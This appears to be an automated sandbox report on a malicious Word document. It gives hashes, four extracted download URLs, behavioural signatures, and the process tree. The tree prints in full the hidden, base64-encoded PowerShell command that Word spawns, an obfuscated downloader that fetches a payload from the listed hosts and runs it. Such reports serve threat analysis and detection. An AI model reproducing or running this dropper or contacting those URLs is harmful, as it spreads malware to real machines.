Analysis
-
max time kernel
45s -
max time network
77s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
01-02-2022 04:23
Static task
static1
Behavioral task
behavioral1
Sample
b4fdb77c5b6eede55fa1025dcbd522ada24dc6fef82efbeac60934cb6a8e8005.doc
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
b4fdb77c5b6eede55fa1025dcbd522ada24dc6fef82efbeac60934cb6a8e8005.doc
Resource
win10v2004-en-20220113
General
-
Target
b4fdb77c5b6eede55fa1025dcbd522ada24dc6fef82efbeac60934cb6a8e8005.doc
-
Size
109KB
-
MD5
be1f448868949ba25e0b199e1e3139b2
-
SHA1
87435983272d0ff58ffaf105452e3e6322694ed7
-
SHA256
b4fdb77c5b6eede55fa1025dcbd522ada24dc6fef82efbeac60934cb6a8e8005
-
SHA512
2834635393ff61b60a06573df17582740e8f41f6c2eb5bdda685c5d5dd494691f4a34748e9693fff3b5834c133eb969f0ba207b8b13677652f8c1dca9bf81a2d
Malware Config
Extracted
http://rechholz.de/yYw1qvd/
http://psd-ga.com/zapgovno/Nhfxs/
http://gtdesign.ch/oFNj7EV/
http://startstudio.it/nDFE7y/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1356 4496 PowersHeLL.exe 81 -
Sets service image path in registry 2 TTPs
-
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4496 WINWORD.EXE 4496 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeShutdownPrivilege 3200 svchost.exe Token: SeCreatePagefilePrivilege 3200 svchost.exe Token: SeShutdownPrivilege 3200 svchost.exe Token: SeCreatePagefilePrivilege 3200 svchost.exe Token: SeShutdownPrivilege 3200 svchost.exe Token: SeCreatePagefilePrivilege 3200 svchost.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4496 WINWORD.EXE 4496 WINWORD.EXE 4496 WINWORD.EXE 4496 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4496 wrote to memory of 1356 4496 WINWORD.EXE 92 PID 4496 wrote to memory of 1356 4496 WINWORD.EXE 92
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b4fdb77c5b6eede55fa1025dcbd522ada24dc6fef82efbeac60934cb6a8e8005.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exePowersHeLL -WinDowsTyle hidden -e IABJAG4AVgBPAEsARQAtAEUAeABwAFIAZQBzAFMAaQBvAG4AKAAoACgAIgB7ADMANwB9AHsANQAzAH0AewAyADYAfQB7ADYAMgB9AHsAMgAxAH0AewA3ADYAfQB7ADcANQB9AHsAMwA5AH0AewAzADUAfQB7ADYAMQB9AHsANwAxAH0AewAzADAAfQB7ADYANgB9AHsAMwA2AH0AewA0ADQAfQB7ADAAfQB7ADYAOAB9AHsAMQAzAH0AewA2ADkAfQB7ADcAMwB9AHsAMQAwAH0AewA3ADIAfQB7ADcAOQB9AHsAMQAxAH0AewA2ADAAfQB7ADcAfQB7ADUANQB9AHsANAA5AH0AewA0ADgAfQB7ADYANwB9AHsANQAyAH0AewAyADUAfQB7ADcANAB9AHsAOQAxAH0AewA0ADAAfQB7ADUAOAB9AHsAOAAyAH0AewAyADgAfQB7ADYAfQB7ADUAfQB7ADMAOAB9AHsAOQAyAH0AewA4ADgAfQB7ADkAMAB9AHsAMgA3AH0AewA4ADUAfQB7ADMAfQB7ADEAfQB7ADIAMwB9AHsAOAA3AH0AewAzADQAfQB7ADYANQB9AHsAOAA5AH0AewA0ADEAfQB7ADQANwB9AHsAMQA3AH0AewA4ADYAfQB7ADQANgB9AHsANQA3AH0AewA5ADQAfQB7ADQAfQB7ADMAMQB9AHsANgA0AH0AewA1ADYAfQB7ADIANAB9AHsAMgB9AHsAOAAxAH0AewA2ADMAfQB7ADEAOQB9AHsANQA5AH0AewA1ADEAfQB7ADcAMAB9AHsANAA1AH0AewAxADYAfQB7ADUAMAB9AHsAMQA1AH0AewAzADMAfQB7ADUANAB9AHsANwA4AH0AewA0ADMAfQB7ADcANwB9AHsAOAB9AHsAMQAyAH0AewA0ADIAfQB7ADgANAB9AHsAMgAwAH0AewA4ADMAfQB7ADgAMAB9AHsAMgA5AH0AewA5AH0AewA5ADMAfQB7ADIAMgB9AHsAMQA0AH0AewAxADgAfQB7ADMAMgB9ACIAIAAtAGYAJwBaACcALAAnAG8ALwBOAGgAJwAsACcAaAB1AC4AZQB4AFoAaAB1ACsAWgBoAHUAZQBaAGgAdQApADsAZgBvACcALAAnAG4AJwAsACcAdQAnACwAJwBZAHcAMQBxAHYAZAAnACwAJwB5ACcALAAnAGEAJwAsACcAZwBOAHUAUgAoACkALAAnACwAJwBlAG0AWgBoAHUAKQAnACwAJwBtACcALAAnAHQALgBXAGUAYgBDACcALAAnACAANwAwAFoAUwAnACwAJwBlAGMAdAAnACwAJwBDACkAOwBiAHIAZQBhAGsAOwAnACwAJwBHAHYAJwAsACcAbwBoACcALAAnAC8AbgBEAEYARQA3AHkALwAnACwAJwB9ACcALAAnAGEAcwBmAGMAIABpAG4AJwAsACcAdQBrAFoAaAB1ACcALAAnAFoAJwAsACcAMABaAFMARAAnACwAJwBmAHgAcwAvAEAAJwAsACcAWgAnACwAJwB0AHQALgBjAG8AbQAvACcALAAnAGEAcwBkACAAPQAgACYAKABaAGgAdQBuAFoAJwAsACcAbQAvAHoAYQBwAGcAJwAsACcAZABlAC8AJwAsACcAdQBlAC0ASQB0ACcALAAnACAAPQAgAC4AKABaAGgAJwAsACcAYgBsAGkAYwAgACcALAAnAGMAYQB0AGMAaAB7AH0AfQAnACwAJwBsACcALAAnAC8ALwBnAHQAZABlAHMAaQBnACcALAAnAGgAdQArAFoAaAB1AHQAWgBoACcALAAnACsAWgBoACcALAAnADcAMABaACcALAAnAC8AQAAnACwAJwBlAGMAWgAnACwAJwBsAGoAJwAsACcAbwAuAGkAJwAsACcARABDACkAOwAmACgAWgBoACcALAAnAHYAJwAsACcAdQB3ACcALAAnAHUAUgBEACcALAAnAGgAdQAuAFMAcABsAGkAdAAnACwAJwB0ACcALAAnADIAMQAzACcALAAnADAAMAAsACAAMgA4ACcALAAnAEcAdgBXAG4AbABoAEcAdgBPAGEAZABGAEkAaAAnACwAJwA3ADAAWgBBAEQAQwBYACkAewB0AHIAeQB7ADcAJwAsACcACgBoAHQAdABwADoALwAvAHQAaABlAG8AbgBlAHQAcgB1AGUAbQBhACcALAAnAG4AcwBhAGQAJwAsACcAZQBOAHUAUgAoADcAMABaAGEAcwBmAGMALgAnACwAJwBkAGEAcwBkAC4AbgBlAHgAdAAoADEAMAAwACcALAAnACgAJwAsACcAKABaAGgAdQBAAFoAaAB1ACkAOwA3ADAAJwAsACcAcwB2AHgALwBAAGgAdAB0AHAAOgAvACcALAAnACAAJwAsACcAbABpAGUAbgB0ADsANwAwAFoATgBTAEIAIAA9ACAANwAwAFoAbgBzACcALAAnAHUAKQAgAHIAYQBuAGQAJwAsACcAaAB1ACsAWgBoAHUAZQAnACwAJwA3ADAAWgAnACwAJwArACAAWgBoAHUAUgAxADAAWgBoAHUAIAArACAANwAwAFoATgBTAEIAIAArACAAJwAsACcAbgAuAGMAaAAvAG8ARgBOAGoANwBFAFYALwBAAGgAdAB0AHAAOgAnACwAJwB1AG4AZQBaAGgAdQAnACwAJwAzACkAOwA3ADAAWgBBAEQAQwBYACAAPQAgAFoAaAB1AA0AJwAsACcAaAB1ACsAWgBoAHUALQBvAGIAagAnACwAJwBaAGgAdQAnACwAJwAwAFoAWQBZAFUALgBOACcALAAnAG8AbQA7ADcAMABaAFkAWQBVACcALAAnAC4ATgAnACwAJwApACAAUwB5AHMAdABlACcALAAnAHEAJwAsACcAWgBoAHUAdwAtAG8AYgBqACcALAAnAGgAdQArACcALAAnAE4AJwAsACcATgB1AFIAVABvAFMAdAByAGgARwB2AGkAaABHACcALAAnAGUAJwAsACcAWgBoACcALAAnAHIAZQBhAGMAaAAoACcALAAnAC8AcgBlAGMAaABoAG8AbAB6AC4AJwAsACcAKwAnACwAJwB1AEkAbgB2AG8AWgBoAHUAKwBaAGgAJwAsACcAbwB2ACcALAAnAFoAJwAsACcAaAB0AHQAcAA6ACcALAAnAGEALgAnACwAJwAvAC8AcwB0AGEAcgB0AHMAdAB1AGQAaQAnACwAJwBjAG8AJwAsACcARgAnACwAJwBoAHQAdABwADoALwAvAHAAcwBkAC0AZwAnACwAJwAoADcAJwAsACcAWgBTAEQAQwAgAD0AIAA3ADAAWgBlAG4AdgA6AHAAJwApACkALgBSAGUAcABsAGEAYwBlACgAKABbAEMAaABBAHIAXQA4ADIAKwBbAEMAaABBAHIAXQA0ADkAKwBbAEMAaABBAHIAXQA0ADgAKQAsACcAXAAnACkALgBSAGUAcABsAGEAYwBlACgAJwBOAHUAUgAnACwAWwBTAFQAcgBpAG4ARwBdAFsAQwBoAEEAcgBdADMANAApAC4AUgBlAHAAbABhAGMAZQAoACcAWgBoAHUAJwAsAFsAUwBUAHIAaQBuAEcAXQBbAEMAaABBAHIAXQAzADkAKQAuAFIAZQBwAGwAYQBjAGUAKAAoAFsAQwBoAEEAcgBdADUANQArAFsAQwBoAEEAcgBdADQAOAArAFsAQwBoAEEAcgBdADkAMAApACwAWwBTAFQAcgBpAG4ARwBdAFsAQwBoAEEAcgBdADMANgApAC4AUgBlAHAAbABhAGMAZQAoACgAWwBDAGgAQQByAF0AMQAwADQAKwBbAEMAaABBAHIAXQA3ADEAKwBbAEMAaABBAHIAXQAxADEAOAApACwAWwBTAFQAcgBpAG4ARwBdAFsAQwBoAEEAcgBdADkANgApACAAKQAgAA==2⤵
- Process spawned unexpected child process
PID:1356
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe a490c0788884a628c1d14b6365b5fa02 jW5FwuBBW0STXcRNHPSlVw.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
PID:3384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3200